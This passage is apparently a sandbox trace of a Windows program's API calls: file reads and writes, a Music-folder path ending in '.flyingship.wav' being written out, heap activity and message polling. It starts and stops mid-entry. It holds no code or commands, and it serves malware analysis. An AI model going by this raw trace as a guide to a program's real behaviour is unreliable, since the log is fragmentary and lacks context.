hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0182.583] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0182.583] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0182.583] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0182.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0182.584] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0182.584] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x2025, lpOverlapped=0x0) returned 1 [0182.584] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0182.584] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x2025, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0182.584] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0182.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0182.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0182.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.flyingship.wav\r\n", cchWideChar=113, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 113 [0182.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.flyingship.wav\r\n", cchWideChar=113, lpMultiByteStr=0x8afe68, cbMultiByte=113, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.flyingship.wav\r\n", lpUsedDefaultChar=0x0) returned 113 [0182.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0182.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0182.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8afe68 | out: hHeap=0x8a0000) returned 1 [0182.584] WriteFile (in: hFile=0x138, lpBuffer=0x9c0b78*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c0b78*, lpNumberOfBytesWritten=0x87f43c*=0x70, lpOverlapped=0x0) returned 1 [0182.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0182.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0182.585] CloseHandle (hObject=0x138) returned 1 [0182.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0182.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0182.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0182.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0182.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0182.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0182.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0182.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0182.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0182.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0182.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0182.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0182.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0182.587] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0182.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0182.587] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0182.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0182.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0182.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0182.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0182.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0182.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c08b0 | out: hHeap=0x8a0000) returned 1 [0182.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0182.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0182.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0182.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0182.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0182.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0182.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0182.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0182.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0182.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0182.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0182.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0182.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0182.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0182.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0182.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0182.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0182.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0182.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0182.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0182.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0182.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0182.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0182.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0182.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0182.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0182.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0182.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0182.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0182.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0182.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0182.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0182.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0182.589] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0182.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0182.589] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0182.589] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0182.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0182.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0182.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0182.589] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0182.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0182.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0182.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0182.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1890 [0182.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0182.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0182.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0182.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0182.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0182.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0182.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0182.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd708 [0182.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0182.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0182.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0182.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0182.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0182.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0182.590] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0182.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0182.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0182.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0182.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0182.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0182.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0182.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0182.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0182.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0182.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0182.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0182.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0182.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0182.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0182.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0182.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0182.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0182.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0182.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0182.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0182.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0182.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0182.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0182.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0182.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0182.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0182.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0182.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0182.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0182.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0182.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0182.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0182.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0182.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0182.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0182.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0182.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0182.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0182.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0182.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0182.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0182.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0182.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0182.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0182.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0182.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0182.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0182.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0182.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0182.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0182.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0182.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0182.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0182.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0182.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0182.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0182.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0182.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0182.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0182.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0182.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0182.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0182.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0182.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0182.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0182.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0182.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0182.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0182.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0182.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0182.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0182.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0182.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0182.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0182.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0182.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0182.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0182.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0182.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0182.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0182.596] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0182.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0182.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0182.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0182.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0182.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0182.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0182.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0182.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0182.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0182.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0182.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0182.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0182.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0182.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0182.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0182.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0182.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0182.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0182.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0182.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0182.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0182.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0182.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0182.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0182.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0182.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0182.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0182.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0182.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0182.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0182.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0182.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0182.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0182.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0182.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0182.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0182.598] RtlAllocateHeap 